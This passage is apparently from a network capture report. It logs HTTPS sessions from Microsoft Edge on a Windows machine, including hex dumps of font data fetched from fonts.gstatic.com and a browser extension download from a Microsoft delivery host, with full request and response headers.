2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 3a 66 63 2b dc 55 dd f4 76 4a 8c 67 19 c8 cf dc c0 a9 f6 5c fb 04 0e 30 9f 45 2b 3a 9d 3b 96 d8 5b 6e bd d6 e7 9c e8 c6 a6 3c ec 04 3f 00 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 3b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 ae cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee a5 e4 ce 91 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 9e cc c8 00 69 5f 40 62 95 20 df ff 5c 62 ff d0 7c 77 74 a5 ee 94 81 37 09 f8 6e 89 76 d0 cc c3 9e ed f1 98 74 e8 44 3c ad 43 b4 7d 7c ef 37 12 7f b8 65 96 f8 5e 7f 6d d6 87 cf c8 3f 3c ff 0f fe 46 0a 5c ba b6 fe 19 70 0e 32 75 0d ee 8d af b1 e1 04 85 42 3c 9e 59 9b c0 78 a6 b0 b5 39 1f b7 d1 de cd 12 22 41 49 d1 15 ab a1 11 33 5c d4 fd b2 5b d9 73 15 d6 f9 35 bc c7 cd bb 1d 79 b6 97 eb f1 e5 7e 9d 14 50 5d 28 7c 07 9c 0d Data Ascii: :fc+UvJg\0E+:;[n<?jOpD1;j=h&U?%h@Q6PlNf"wi_@b \b\|wt7nvtD<C}\|7e^m?<F\p2uB<Yx9"AI3\[s5y~P](\|
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 82 39 aa e0 7a ec d0 f9 66 30 94 41 fc df ee db 1c a9 13 e6 2d 30 13 82 a1 ce 12 31 7d 82 53 e2 83 47 45 59 27 58 b8 8f 29 06 91 69 cf 5a f8 cc 88 c6 0f 64 a8 24 03 ce ef 34 a6 34 d9 53 76 aa d1 f7 b6 0a 2b fc d4 75 76 ce 3a 75 4f 2d 57 df f3 bf de ff fb dd 66 83 81 23 92 f4 b0 c9 4d 75 c1 14 7c 9e f8 b8 ab 3c 75 20 0d 34 51 a3 0e b9 57 8f 5c c9 54 10 9d 35 cc 9b 85 ba 8d ce d3 40 ea df eb f4 bd c6 2c 8d bf 7f cb f8 66 fe ef 5a ba 1d ba 7f 9e b7 3c ff e1 39 cb 7f 7d 77 90 3e 1b 53 53 b5 ff 3a 2b 59 eb 1a b5 ef 9a f3 97 e0 e3 a3 e0 8e ca 4c fb 5e 74 ea 56 74 b6 f6 9f d3 57 e1 d7 9f b9 df 5e fe f7 bb 96 ae e7 1e 0d df 6b e7 fb 2c e6 b1 79 7f 1c 1b ef fb ff 1f ba be 0c 5d 77 5f 05 74 4c cd 62 ce b9 d6 b7 e6 3a 9d e3 7f 1f 1a cd c7 fb 67 75 fb f1 97 bf fe e3 Data Ascii: 9zf0A-01}SGEY'X)iZd$44Sv+uv:uO-Wf#Mu\|<u 4QW\T5@,fZ<9}w>SS:+YL^tVtW^k,y]w_tLb:gu
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 33 4d c7 0c 67 6e 81 d6 1e 0c 0b 79 e1 e5 4a 9e 81 e8 0e 6d e9 ca e1 60 fa 07 7f fa d2 b1 1f f7 7b ac 3f 4a 13 55 ac f1 4c 7f 94 cf f0 fa f1 b6 7e 2d 9f 5f f6 86 cc fe f1 ec 09 fd 70 24 26 57 1c cf 8f 61 96 f1 4e 24 37 5b 2c f1 37 09 ff 3e 8d 4e e3 76 3b 30 89 99 dc ba 80 99 fa f5 86 7a ab 17 00 10 99 70 d6 78 75 3f ec 5d 26 c0 29 73 23 b1 4d 01 b1 bd 85 22 65 c6 ae 4d 05 29 bb 19 a4 97 d3 26 50 39 76 5a 02 7b 3b 5c cd 19 16 9a 34 6a ca 98 31 83 a3 30 c0 8d 8b 90 69 14 2e 18 a7 11 fc 43 a4 1b 50 25 a6 9a b3 38 b3 01 a7 ed 89 86 13 1f da e6 66 69 88 9b 9b cb a3 0e 88 10 49 34 ac c5 ac 87 cc 0e df 3a 83 59 3f 4a c7 9a 9c 4a 52 22 4a 73 50 10 93 5b 04 26 5d e4 1b 03 5e 57 1d b5 9f 07 15 ea 11 56 a2 32 1c 57 08 4b 8e 3a dd 14 09 a5 9a 54 87 09 2c df 70 99 49 Data Ascii: 3MgnyJm`{?JUL~-_p$&WaN$7[,7>Nv;0zpxu?]&)s#M"eM)&P9vZ{;\4j10i.CP%8fiI4:Y?JJR"JsP[&]^WV2WK:T,pI
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 3d 97 d3 d8 25 32 96 b3 f5 13 f7 6e 04 c3 e8 d7 24 af 68 00 67 eb c3 66 e7 0c 80 f3 86 ed 66 61 be 93 2c c1 a2 81 5f 40 75 19 01 ec 81 b2 11 59 6b 02 01 7c 80 cd 06 9c b7 f6 39 2e 1b a2 d1 59 0b 31 ae 2b a8 f9 19 97 78 ba 9e 92 04 eb 38 0f b1 da 61 42 cf b8 b8 ab 80 50 16 da 7c e0 2a 5d 2e b6 61 3d 16 a7 f7 ad 25 37 09 0c 17 4a fa a3 b0 2f 74 b2 60 63 c4 b5 32 fd ca 4b dc 91 50 cd 08 cf a1 3e ef 10 50 75 05 0f a4 06 bb 61 21 1b 94 db 98 9a 6d 25 ee 69 db 2b 4b 9f 80 46 c6 7a 5d 13 fe 95 45 1a 44 be bd d3 f7 20 9f 7f 88 83 9f 5b 5b 41 3d 0c 7f 6e 6e 02 8a 0a a9 66 0f 64 38 ff 27 1a e0 86 95 3d 0e 65 8e 2a 9e ff b3 5a f5 13 b7 6b 4c e2 da dd 53 96 36 98 be 35 e0 8b a2 03 ec 6d 83 0f 98 a6 6a 9a 7d d4 30 cf b9 22 24 be 95 ed ae b5 82 4d 0c 6d 44 68 ea 50 61 Data Ascii: =%2n$hgffa,_@uYk\|9.Y1+x8aBP\|].a=%7J/t`c2KP>Pua!m%i+KFz]ED [[A=nnfd8'=eZkLS65mj}0"$MmDhPa
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: c6 bc 81 e5 c6 01 f8 80 6e be 68 ae 8d 1a 92 d9 22 7c fb 47 cd 55 a8 b9 72 2b d4 f6 c4 b2 bb dd a3 21 3e c1 52 53 40 cc 0f 98 69 56 28 ab c0 b8 20 06 f5 02 9a 6f 68 bf 82 e6 8f 24 99 81 79 93 8e d4 f5 47 b4 3f 91 f0 93 e1 db ea 74 d9 df bc 02 e8 81 b4 53 49 59 03 c4 1b 90 6e de 93 27 17 a4 fa 97 68 50 4b ef a1 19 2a b3 8e 70 02 6b db 66 44 24 b0 33 79 cf de 43 b1 cd cd c3 41 86 8d 22 07 8e 36 37 b7 cc 9f 0b de bb 60 25 1c fe f7 ea 9b 07 c5 80 f6 9d 10 df 4c b8 27 ef 1c 14 d6 c4 c3 c8 1c ee dd 3d 4d da 8a 0c c4 52 71 54 0a cc 3d d5 5f 29 07 02 fd 8d 5b 75 1c 35 30 b0 47 f8 b3 f1 28 6e 46 7c 56 31 fc 89 c5 6c ca aa 76 67 10 f7 66 c9 bd 26 86 fd fd 33 5d db d6 b3 31 ae 67 3e af 13 4c ea cf 63 28 1c 73 d5 b7 cf 2e dd b8 9a fa 75 a8 12 83 1e ae 82 2c 32 d0 c3 Data Ascii: nh"\|GUr+!>RS@iV( oh$yG?tSIYn'hPK*pkfD$3yCA"67`%L'=MRqT=_)[u50G(nF\|V1lvgf&3]1g>Lc(s.u,2
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 0c 27 c9 15 33 8e 4d 6d 30 cb db c6 1d 95 4b 44 47 2a fe 65 6d 62 82 56 4a e1 cb 97 55 fc 6d 2d fc d8 a1 69 e9 bd ea 7b 41 b9 d4 6c 30 29 3a d9 54 cc 2c 05 5e a2 02 b3 c5 bb 08 19 d8 62 b9 d7 a5 62 06 3c 34 40 2e 25 3c 2e c3 97 e2 9d d1 3b c2 71 73 13 d5 e3 35 1f 0d 77 bd 52 9b 9d 01 9b 76 ce d3 0a 52 52 c7 6b 5d b2 e6 95 0a ae bf 14 a3 21 ab aa 31 20 bd b4 d7 42 bf e6 ac e0 5e 40 6f ac 03 3a 6a 01 54 03 d6 36 21 06 2c ba 37 91 a3 0c 4f d2 f8 12 13 46 bb 84 e9 6e dd 4f 81 45 78 78 68 42 e3 13 1f ac 1d 5f 60 04 f8 9a c2 4f 39 8e dc 8c 8d 17 91 02 eb a3 e5 59 ed 20 d2 12 4f e2 a7 7e 66 86 b7 89 8d 5e 42 dd ad 6d cf 2f c2 ed a0 58 e6 a4 e8 94 cb 4f a1 44 3b d4 2c b4 50 44 ce 14 d0 d2 b6 82 1a 45 be 6a b8 a8 f3 70 b4 81 60 59 46 50 39 3d 99 b2 b8 fb 19 23 90 Data Ascii: '3Mm0KDG*embVJUm-i{Al0):T,^bb<4@.%<.;qs5wRvRRk]!1 B^@o:jT6!,7OFnOExxhB_`O9Y O~f^Bm/XOD;,PDEjp`YFP9=#
2024-07-26 18:10:20 UTC	1390	IN	Data Raw: 4e 7f fd fa f3 8f 27 8f ff d8 06 aa 7b 8f 52 b0 a4 78 a6 f8 ce 72 c4 5f 39 36 74 23 3d a2 5e 64 ed 29 3c 87 d5 63 57 ef 41 05 40 38 0f e8 2f d0 e8 ee 60 78 31 a8 e0 aa 56 f0 9d a3 17 ab 1f c9 83 ee a5 c0 0c d4 43 84 42 20 54 19 07 77 89 e3 f9 04 05 67 92 9e a7 b0 83 ae 1c df b9 60 e3 01 68 2e f0 49 a9 c5 b0 3d 74 1f 03 d9 07 37 09 19 27 70 29 60 8f d4 1e 13 eb a4 2d 83 17 0b 58 58 65 0b 2b 09 80 2e 29 5a 5a 1e 7b 0b 46 a0 a2 7f e9 a8 77 64 98 5b 0e e4 3a 8a 11 91 76 32 04 ed 6a 28 4f 01 04 c6 70 85 84 f6 e7 b3 20 6e 41 39 10 d0 00 a9 42 a0 f8 c0 6e f0 6c 6d 44 a1 12 09 6c f4 67 bf 3f ab ff f1 f8 f1 1c 10 16 b7 35 9a 93 9f 70 5f e2 ca bd 60 c7 46 0f d8 18 13 66 58 1b 01 f9 88 5d 2a e3 a5 e8 eb b3 27 1a 94 30 a2 67 4f 44 be 18 97 0f cf c7 58 11 76 5a 6f 97 Data Ascii: N'{Rxr_96t#=^d)<cWA@8/`x1VCB Twg`h.I=t7'p)`-XXe+.)ZZ{Fwd[:v2j(Op nA9BnlmDlg?5p_`FfX]*'0gODXvZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49793	142.251.40.163	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:20 UTC	924	OUT	GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1 Host: fonts.gstatic.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" Origin: https://accounts.google.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:21 UTC	836	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes" Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]} Timing-Allow-Origin: * Content-Length: 52280 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 24 Jul 2024 17:56:27 GMT Expires: Thu, 24 Jul 2025 17:56:27 GMT Cache-Control: public, max-age=31536000 Age: 173633 Last-Modified: Tue, 23 May 2023 16:36:38 GMT Content-Type: font/woff2 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:21 UTC	554	IN	Data Raw: 77 4f 46 32 00 01 00 00 00 00 cc 38 00 15 00 00 00 02 16 18 00 00 cb be 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 89 5e 1b 81 fe 24 1c a4 34 3f 48 56 41 52 8e 17 3f 4d 56 41 52 39 06 60 3f 53 54 41 54 81 2a 27 2c 00 85 4a 2f 81 00 11 08 0a 81 e6 60 81 b6 28 0b 87 5a 00 30 83 b7 52 01 36 02 24 03 8f 2e 04 20 05 86 12 07 a8 4b 0c 07 5b 93 f8 71 86 96 63 07 92 54 ee cb ae e1 dd c5 98 3e cb 50 de 6a d8 a6 60 b3 77 bd d9 99 23 fb d3 d5 8d 25 cc b3 be 83 db 81 f6 e2 4e bc 22 fb ff ff ff 17 24 15 19 33 cd 30 ed 36 18 0c 04 af ea d5 ff 87 98 20 b8 4c 04 72 58 2f 72 5b 6a ce 79 9c 7c 2a 28 08 34 cc 81 25 23 f7 8c 92 b1 96 32 ae 76 b3 6d c6 14 2d 90 1d 25 bb 89 cd 9c 15 e8 3b 2d 1d 59 d6 7b 1b e1 26 f6 b9 4f 3d 23 6c 40 09 c7 e5 6b Data Ascii: wOF28^$4?HVAR?MVAR9`?STAT',J/`(Z0R6$. K[qcT>Pj`w#%N"$306 LrX/r[jy\|(4%#2vm-%;-Y{&O=#l@k
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: 9e 74 f3 9f 10 dc 18 11 48 20 64 8d cb 65 5f d6 be 4b 2e f3 b2 2f 09 2b 38 00 51 11 50 c4 85 5a 51 0b ae b6 d6 b9 3b 9d 1d ce 55 fd ca af 9d ae 5d bb a7 f8 f7 ba ea bf 0e 5f 14 65 2a b3 b2 a0 f9 03 b2 37 31 e1 8f 3f 8e 37 11 4f 52 76 bf 3f cb d6 ae eb 6c ac b5 d6 47 7c d8 50 94 92 ee 7c 3a fd 9a 19 49 16 58 06 c9 32 b0 2c 93 4c 89 ed 00 c3 ee e6 ff 05 64 e7 67 ef 5d 7d 57 23 75 57 5d 51 6e 75 50 2d 73 e0 3b b1 2d 59 9a e1 9f ef ef e5 5d fb dc df 12 b0 d2 00 43 16 90 6a 5f f8 4d 30 84 11 8a 79 1f cf 1c 0b a7 e5 ec 4a f2 f9 d2 0b ea f4 01 09 c6 b1 e4 94 4e 59 00 0e 40 41 ff fd 9a 2c ed ce d4 9c de 2d 8c 46 95 c0 b5 03 e2 c0 27 fd d0 77 9f 2f 6a 35 67 a6 76 55 53 eb 16 d8 55 dd d6 a1 30 84 26 82 9d 19 79 37 b1 4c 50 f9 1d 91 aa ee 25 7f 89 8e 8c d2 59 0e a1 Data Ascii: tH de_K./+8QPZQ;U]_e*71?7ORv?lG\|P\|:IX2,Ldg]}W#uW]QnuP-s;-Y]Cj_M0yJNY@A,-F'w/j5gvUSU0&y7LP%Y
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: 65 70 0b 00 48 00 80 17 af 3d 8f bc f6 ef 15 6d 69 2f 46 5b e3 dc b8 c0 42 a2 10 af f1 05 07 17 e3 19 43 ce f4 ed dc b8 eb cd f5 a3 d1 e6 bd a3 19 7b e7 d5 df be ff e3 2f ff eb 5b ff 00 8a 19 c1 ff ad 5f ad 8b a0 8b 98 24 cb ee b0 b9 0b ef 63 fd a7 fd 8f bf 02 7f 31 00 94 00 00 05 7d f1 d2 d5 4f 37 ac 5f ae 39 bf 6a 98 bf 6e b8 bf 5e 33 fe bc 61 fc 65 43 ff eb 1b ec ff dd ad 37 8f ac bf bf 14 be 75 e4 be fb f2 f0 bd a3 f1 eb ca bd 6e dc eb 87 e1 f5 4f fc a7 8c 7f f3 d0 bd 79 3c 79 73 a5 bf b9 32 de fc ad 7a e6 e1 eb 1f 94 cf ed 67 cf 43 93 9b 6f 1b b7 57 87 c5 8f d8 8b c1 e6 a5 bf 7f f7 1d f7 fe d7 f3 d7 6c 69 6b 39 6d e4 74 af b4 67 d6 e9 ea 10 36 3c 3f 35 e6 2b 73 fe f5 68 fe 43 7d 33 c6 6e d6 1a db f1 78 a7 68 cb 33 b2 53 ce 76 b1 fe f2 86 b1 bc e1 2e Data Ascii: epH=mi/F[BC{/[_$c1}O7_9jn^3aeC7unOy<ys2zgCoWlik9mtg6<?5+shC}3nxh3Sv.
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: 44 50 4e a5 a6 31 f2 fc 72 f4 49 cd 52 b4 4c fb 49 47 76 ce 13 5e ae 7d 2a 5e 38 93 21 c1 46 bc b0 49 aa 45 f6 f7 7b 10 fc 2a 87 6b b3 27 cb 51 28 7a f9 41 7f 8a 56 24 3a 34 2b 5b 14 f8 75 a5 b3 db 6d 5e 8e 34 6d 33 ca c3 61 8c 05 b5 50 36 de 7c 59 e5 fa fb 51 53 c3 ce 79 ab 5e 02 19 f5 55 c0 0d bc 4f e4 c6 93 40 2b 9d 97 a7 6a 33 45 3a d4 24 c0 cc 0c c0 5d f7 a3 fb f1 c5 fc b1 58 87 bf cc 43 e5 9a 0b 3a d0 28 1f 86 c8 ed 5c 0b e7 d8 cb 34 c3 91 1e 7e 48 ea fd 80 5a b3 96 52 aa 92 c6 84 0a f0 21 af 01 6b c1 d1 f0 1c 2d 3f 38 2d 4b b8 f9 ef 72 f4 0c 9d 53 4d b2 e6 6c d3 97 00 ab 75 9b fb a3 c6 a4 b5 de 60 68 b6 ff c8 a7 1f 7f 9c 91 cf 6f 74 18 ee fd 77 b8 28 b1 55 94 6a 67 a6 00 7c c3 57 a4 10 e0 e6 4d bf 20 25 3e f6 f3 5e db 9c 48 e6 06 69 3a 5b 6e da dc Data Ascii: DPN1rIRLIGv^}^8!FIE{k'Q(zAV$:4+[um^4m3aP6\|YQSy^UO@+j3E:$]XC:(\4~HZR!k-?8-KrSMlu`hotw(Ujg\|WM %>^Hi:[n
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: 85 c2 d9 4d af 71 b8 1e 37 e0 46 7d 96 5b 3e 8f 3a b3 83 38 c7 c5 39 61 da 7e 3a 5c 05 7d c3 d3 37 8d be 65 72 41 dd 05 dd 6d b0 47 f7 12 f6 e9 7e e0 d8 95 c7 2b d0 93 01 ce 96 45 bd ae 4b ab ad 5b 4a 0c d6 7b a7 e7 02 3d 0f 7c 8d 8b 7a 3d 81 5b b8 fd f9 4f b9 3c 79 bf c3 7c ad 02 de a0 46 3a e9 66 b2 36 55 c6 56 21 08 2d d8 45 45 95 75 7c c4 37 05 41 38 70 73 43 7a 68 a3 85 02 a1 c2 35 82 cc b0 b4 1d 1d 67 3f 56 1d 59 c3 72 36 e2 f9 e2 7e 0e f1 c0 52 8e a0 ca c2 2e e5 c8 4e b6 20 53 70 41 56 3c 3c 42 86 51 05 8b 87 04 c9 2e 75 1a d3 bc 10 52 a8 40 09 06 6c 40 89 50 dd ef f0 c0 24 21 72 5e 11 7b 1a 65 15 d2 47 d9 fa 64 88 48 1a 4c e7 d8 d8 d1 b4 7a 07 b6 ae 2e 85 86 5b bf 04 23 15 8d 08 a6 03 ac 71 af ce 1e 35 99 a7 b4 90 d0 a0 8d 4e 1f 0c 73 95 64 42 fb Data Ascii: Mq7F}[>:89a~:\}7erAmG~+EK[J{=\|z=[O<y\|F:f6UV!-EEu\|7A8psCzh5g?VYr6~R.N SpAV<<BQ.uR@l@P$!r^{eGdHLz.[#q5NsdB
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: cb 8d ea 4d b7 6a d0 77 f5 a9 ab 67 ba 5d ff 83 3b b0 75 0d 9e 08 0e d1 96 06 1e 8a 5e a4 2c 60 44 8b b8 ed 98 d3 14 07 a0 38 61 4f 16 1d 38 5b 84 cb 0d 47 ee 38 f1 88 32 9e bc e8 f2 8e ce 7c 2d c3 12 74 47 0b b6 1c b2 c2 2a 48 84 81 ad c6 5d 24 b4 28 3c 44 c3 13 f3 bf a7 58 f1 b4 25 50 90 4a 94 84 96 2c 15 4f 9a 1c 48 ae 61 26 0f 5a 3e c8 1a fc a9 58 a2 00 5a 61 0b 15 bd b4 86 52 58 6a 3d 81 ca e2 32 1b 6c a4 a3 e2 97 20 db ec 85 35 68 24 b4 cf 7e a6 1d cc e0 d1 7d e6 f8 5e 37 66 80 93 d3 c7 61 3e 16 f7 42 2f 3b 6c 3f c3 f6 4b b2 b1 69 1e af 59 8e 7a f3 8d 0a 81 37 f0 8d 21 f0 07 62 6f 91 78 87 d8 78 94 f8 d3 7b 16 fe c2 d8 04 26 3e 60 6c 32 4d c6 61 2c 2c b3 e8 30 f9 0c 45 89 62 c5 14 30 1a db 82 d7 0c 4e e2 53 89 d9 51 c9 19 93 32 4f aa 8b 9d 74 b1 93 Data Ascii: Mjwg];u^,`D8aO8[G82\|-tG*H]$(<DX%PJ,OHa&Z>XZaRXj=2l 5h$~}^7fa>B/;l?KiYz7!boxx{&>`l2Ma,,0Eb0NSQ2Ot
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: 2c f3 a1 19 84 d7 af d8 df 5c 35 5a b0 ef 4d db 1e e6 80 7c 51 aa f9 b8 66 4c ed 5e 8d c9 9e eb 9c 93 6a 57 4e 5b 78 f6 ca 2b 9e ae 7b 22 d7 0c d0 e9 8a 3b 39 65 98 0e 87 00 bb c5 7d 93 91 37 52 ab e7 69 56 b1 2e b1 9f 65 55 9b e3 95 e3 c5 cd da ab c5 72 ca aa 2d 53 6a 61 7c b0 98 12 5a 98 a4 ca 37 ef 66 e6 b2 0a 55 02 f3 f5 2d 54 aa 7e 39 cf c5 c3 b7 4c 0f 33 85 15 5f aa 19 8d 84 a1 0b 45 58 45 62 10 90 0b c0 6d 8a a0 07 6a 9c 6b 1f 47 8d b1 b5 30 95 5b 75 ad 11 8c d8 22 9c 8b ba 04 19 3c 4c 3e b4 5e 56 93 40 cb a1 0a 80 05 79 e7 76 b6 43 bb c9 cc 1f e1 41 35 ec 54 bb 81 06 ce b3 37 98 0a 0c 0a 34 c2 da 8a d7 00 54 58 b1 89 1c 6d c2 f0 12 a8 70 4d e1 85 86 dd 64 97 03 76 d8 49 38 d6 b5 52 f8 cb ee dd 72 96 ee e9 10 40 4a 21 3c 5e cc 02 a3 b2 d0 92 0f 6f Data Ascii: ,\5ZM\|QfL^jWN[x+{";9e}7RiV.eUr-Sja\|Z7fU-T~9L3_EXEbmjkG0[u"<L>^V@yvCA5T74TXmpMdvI8Rr@J!<^o
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: 5c 67 d3 86 5a 06 0c da 8f e0 9a f4 a8 f8 33 d3 ed c1 7d 5d 18 9d a5 f1 c4 1b 3c be f8 51 40 72 a3 40 1f 60 09 14 ea 1f ce 59 10 cc 65 6d 68 68 06 dd 2c 9a 56 8b 6f 25 4d d4 6c 33 c6 57 f5 36 2f a8 7a 6d 6c 8e 48 aa 04 2e a8 b4 b3 6f 29 26 29 7a 95 57 2c 9c d1 ba 73 18 f4 63 37 dd 1a 69 c7 9b b8 46 eb 6d 23 d6 48 55 b5 96 14 4f 3c e5 54 0b 54 e3 52 5c dc 43 b6 34 e7 50 05 5c 63 4d 82 72 aa fc 90 4f 6a b8 0a ca cd c2 a1 46 97 dd 14 50 c1 77 12 d2 54 c7 45 cb 62 bc ec 9e 4e ac 3a 05 4d 39 f3 f2 fb 4e a1 ab 16 79 03 b6 62 fc fa 6a ec ca 27 85 ce bc f2 c7 95 98 0a 83 0e 3e f3 aa 9f 10 84 53 f6 68 f2 f6 cc ab 7f b4 05 6e a1 42 4a e8 9a 03 97 1e d4 74 63 16 4d 98 9e fc 90 07 79 98 de 3c ca e3 3c 49 5f 9e e6 59 7e 4c 7f 7e ca f3 bc c8 40 5e c2 6c 09 33 98 9f a3 Data Ascii: \gZ3}]<Q@r@`Yemhh,Vo%Ml3W6/zmlH.o)&)zW,sc7iFm#HUO<TTR\C4P\cMrOjFPwTEbN:M9Nybj'>ShnBJtcMy<<I_Y~L~@^l3
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: 51 ef 35 83 5e 1f ff 57 33 7e ab 99 ec 95 62 d4 2f 6f 94 f5 13 65 bd f7 47 bb 40 6c ee 73 6d 7f d1 3b 4b f6 a1 de fa ea ec ff 9f 5f 68 87 cd 4d 38 fa c3 4b 81 76 b9 39 5c 33 dd 27 cb c3 f5 36 3d c6 37 6a ae 3f 9e bd 54 3f f2 dc 34 37 9f f6 d6 ef 55 7b 6d f6 5c 3b d6 9f 9e 3d d0 ce 9f 69 b7 9e 69 df fd 4f 18 c5 e5 c5 93 dc 6a 9f 0f fa 9f 48 9e ea e9 73 7d 75 a3 7f f2 37 59 dc ff dc 95 f1 f9 d9 ae 77 7d 53 4d 5e 57 57 6f 7d 93 f3 73 36 f9 5a fc 62 58 be 1e 59 fc f3 b7 7a eb 3f 0a f7 7b 54 fb 9e ec 7d 6f fd 60 ea cf df 7b 61 49 fd a0 ea f0 0b b7 e3 cf e6 78 16 75 a6 20 70 75 56 f8 d1 93 09 a4 a0 f6 e8 d1 54 a9 c1 dd cb bf 8d 52 ff 01 02 a3 80 82 c6 df 31 c4 b6 ff 01 dc 01 98 42 08 e6 e7 1d 5c 70 c9 bf 7f 55 7e e9 a0 65 af 1d ad b5 58 7f 2f 44 64 aa 65 45 cb Data Ascii: Q5^W3~b/oeG@lsm;K_hM8Kv9\3'6=7j?T?47U{m\;=iiOjHs}u7Yw}SM^WWo}s6ZbXYz?{T}o`{aIxu puVTR1B\pU~eX/DdeE
2024-07-26 18:10:21 UTC	1390	IN	Data Raw: a0 0a 5e 74 58 97 3a a2 67 6c 28 cd 0d 01 d0 02 cf a3 9c a9 f1 5e 52 19 aa 6f 87 43 d2 a0 d1 82 71 e9 82 d6 40 9a 26 37 6e 2e 6d f9 08 d5 77 ac 91 ea 9a a1 30 5d ee 34 74 02 7f 4c ba a7 fd 1e cb 9a 6a e0 c6 c5 4c ba 44 69 60 7b 9b 42 38 9b e6 ed 6a 28 3c 0d 43 2c 64 b2 9a 08 9d 63 a1 bc 2e 6f d2 cc 50 f2 ec 0e dc 07 0a 75 91 7a 2b ef 2d 34 ae 78 67 a2 ea 54 a7 2a 73 42 0c d0 cb e0 50 bd 81 9e eb 59 79 5a 77 5e 2f c3 6f 38 b0 0c 36 6e 2b 73 83 b8 b4 d3 43 10 25 42 29 6c 7b e4 93 fd 37 7a 7c 4d ed 5e 5e 60 df d2 da ac dc 6a 43 90 6b 92 db 4c 73 7c f9 65 cb ba 65 35 23 69 56 57 3f 1f 49 98 88 8c 84 62 f6 4f bf 6e c9 42 ce 08 49 22 92 b4 68 59 ca 42 98 f1 52 9a 72 b3 db 59 fb 97 4a 5a f7 de 2d 56 fc c1 12 38 43 f0 1d 99 cb 52 08 34 b6 89 b6 20 2f 75 8d f9 a3 Data Ascii: ^tX:gl(^RoCq@&7n.mw0]4tLjLDi`{B8j(<C,dc.oPuz+-4xgT*sBPYyZw^/o86n+sC%B)l{7z\|M^^`jCkLs\|ee5#iVW?IbOnBI"hYBRrYJZ-V8CR4 /u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49796	152.195.19.97	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:21 UTC	616	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722622217&P2=404&P3=2&P4=HRMAGmFP8EnBZRt3MBzrWkGoEL886HyLUTisCaE9WLiFCc98%2b6UZVpkmckHSlQ4wxX7sFV9VZU%2fvGxngRqL8XA%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: CsGSn4HudrHHhUu1O19xTf Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:22 UTC	632	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 1943952 Cache-Control: public, max-age=17280000 Content-Type: application/x-chrome-extension Date: Fri, 26 Jul 2024 18:10:21 GMT Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31 MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0 MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4 Server: ECAcc (nyd/D11E) X-AspNet-Version: 4.0.30319 X-AspNetMvc-Version: 5.3 X-Cache: HIT X-CCC: US X-CID: 11 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Connection: close
